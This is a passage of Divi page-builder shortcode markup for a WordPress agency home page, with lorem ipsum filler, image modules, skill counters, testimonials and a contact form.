width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" 